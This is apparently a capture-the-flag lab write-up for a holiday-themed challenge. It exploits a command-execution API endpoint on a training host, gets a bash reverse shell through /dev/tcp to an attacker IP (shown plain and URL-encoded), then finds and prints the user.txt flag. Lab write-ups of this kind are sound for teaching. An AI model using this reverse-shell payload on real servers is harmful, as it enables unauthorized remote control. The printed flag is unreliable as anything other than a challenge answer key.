Another day, another hack from the Christmas Monster. Can you get back control of the system?
Access the web server on http://[your-ip]:3000/
McSkidy actually found something interesting on the /api/cmd endpoint.
Check out the supporting material here.
Setup
1kali@kali:~$ curl http://10.10.79.41:3000/api/ls2<!DOCTYPE html>3<html lang="en">4<head>5<meta charset="utf-8">6<title>Error</title>7</head>8<body>9<pre>Cannot GET /api/ls</pre>10</body>11</html>1213kali@kali:~$ curl http://10.10.79.41:3000/api/cmd/ls14{"stdout":"bin\nboot\ndata\ndev\netc\nhome\nlib\nlib64\nlocal\nmedia\nmnt\nopt\nproc\nroot\nrun\nsbin\nsrv\nsys\ntmp\nusr\nvar\n","stderr":""}
Let’s get a reverse shell on the target
1curl http://10.10.79.41:3000/api/cmd/bash -i >& /dev/tcp/10.9.45.74/9999 0>&1
But of course we need to url encode the payload
1curl http://10.10.79.41:3000/api/cmd/bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.9.45.74%2F9999%200%3E%261
#1 What are the contents of the user.txt file?
1[root@ip-10-10-79-41 /] find / | grep -i "user.txt"23/usr/share/doc/fontconfig-2.10.95/fontconfig-user.txt4"/home/bestadmin/user.txt"
1[root@ip-10-10-79-41 /] cat /home/bestadmin/user.txt2cat /home/bestadmin/user.txt3"5W7WkjxBWwhe3RNsWJ3Q"
